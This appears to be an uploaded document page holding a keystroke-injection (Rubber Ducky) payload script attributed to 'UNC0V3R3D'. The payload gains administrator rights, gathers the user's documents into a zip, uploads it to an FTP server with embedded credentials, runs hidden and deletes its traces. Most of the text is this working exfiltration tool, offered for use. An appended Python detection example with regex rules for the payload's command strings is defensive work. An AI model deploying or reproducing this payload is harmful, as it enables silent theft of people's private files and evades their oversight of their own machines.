Exfiltrate Documents

This document outlines a script designed for exfiltrating documents and uploading them to an FTP server. It includes commands to create a report of user documents, compress them into a zip file, and upload the zip file to a specified FTP address. The script is executed using PowerShell with administrative privileges and cleans up temporary files after the upload.

Uploaded by

shanabuzi

REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)

REM Description: Exfiltrate documents and upload them to an FTP server.


REM Version: 1.0
REM Category: Exfiltration
DELAY 800
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 800
ALT y
DELAY 800
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' +
$folderDateTime
ENTER
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body
{padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid
black;background-color:white;height:100%;overflow:auto;}#left{float:left;
background-color:#C0C0C0;width:45%;height:260px;border: 4px solid
black;padding:10px;margin:10px;overflow:scroll;}#right{background-
color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid
black;padding:10px;margin:10px;overflow:scroll;}#center{background-
color:#C0C0C0;width:98%;height:300px;border: 4px solid
black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style >
$fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr
size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING $Report = $Report + '<div id=center><h3>User Documents
(doc,docx,pdf,rar)</h3>'
ENTER
STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx,
*.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)
ENTER
STRING $Report = $Report + '</div>'
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING $final = 'C:\Windows\Report.zip'
ENTER
STRING $ftpAddr = "ftp://username:[email protected]/Report.zip"
ENTER
STRING $browser = New-Object System.Net.WebClient
ENTER
STRING $url = New-Object System.Uri($ftpAddr)
ENTER
STRING $browser.UploadFile($url, $final)
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING remove-item 'C:\Windows\Report.zip'
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 800
STRING C:\Windows\config-58477.ps1
ENTER
DELAY 1000
ALT F4
DELAY 800
GUI r
DELAY 800
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 800
ALT y
DELAY 1000
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 800
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:
$false
ENTER
DELAY 800
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-58477.ps1
ENTER
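
For defenders, the strings this payload types leave recognisable traces in process-creation and PowerShell script block logs. The following is an added detection example, not part of the uploaded script or its author's code; the rule names, hostnames and the FTP host in the sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Patterns taken from the strings the payload above types (rule names are this example's own).
RULES = {
    "elevation_via_runas": re.compile(r"start-process\s+\S+\s+-verb\s+runas", re.I),
    "exec_policy_unrestricted": re.compile(r"set-executionpolicy\s+['\"]?unrestricted", re.I),
    "hidden_ps1_from_windir": re.compile(
        r"-windowstyle\s+hidden\b.*-file\s+\S*\\windows\\[^\\\s]+\.ps1", re.I),
    "shell_com_zip_staging": re.compile(r"new-object\s+-com\w*\s+shell\.application", re.I),
    "webclient_upload": re.compile(r"\.uploadfile\s*\(", re.I),
    "ftp_uri_with_credentials": re.compile(r"ftp://[^/\s:@]+:[^/\s@]+@", re.I),
    "script_self_delete": re.compile(r"remove-item\s+\$myinvocation\.invocationname", re.I),
}

def match_rules(text):
    """Return the sorted names of every rule whose pattern occurs in text."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def triage(events, threshold=3):
    """Flag hosts where at least `threshold` distinct rules fired across all events.

    A single hit (an admin changing the execution policy, say) is common and
    noisy; the combination of behaviours is what marks this payload.
    """
    hits = defaultdict(set)
    for ev in events:
        hits[ev["host"]].update(match_rules(ev["text"]))
    return {host: sorted(rules) for host, rules in hits.items() if len(rules) >= threshold}

# Constructed sample events: process command lines (e.g. Event ID 4688) and
# PowerShell script block text (Event ID 4104). Hosts and the FTP server are made up.
SAMPLE_EVENTS = [
    {"host": "WS-01", "text": r"powershell Start-Process cmd -Verb runAs"},
    {"host": "WS-01", "text": r"powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser"},
    {"host": "WS-01", "text": r"powershell.exe -windowstyle hidden -File C:\Windows\config-58477.ps1"},
    {"host": "WS-01", "text": '$ftpAddr = "ftp://user:pass@ftp.example.invalid/Report.zip"'},
    {"host": "WS-01", "text": r"$browser.UploadFile($url, $final)"},
    {"host": "WS-02", "text": r"powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser"},
    {"host": "WS-02", "text": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, rules)
```

The threshold keeps single, commonly benign events (WS-02 in the sample) from alerting while the full chain on WS-01 is flagged.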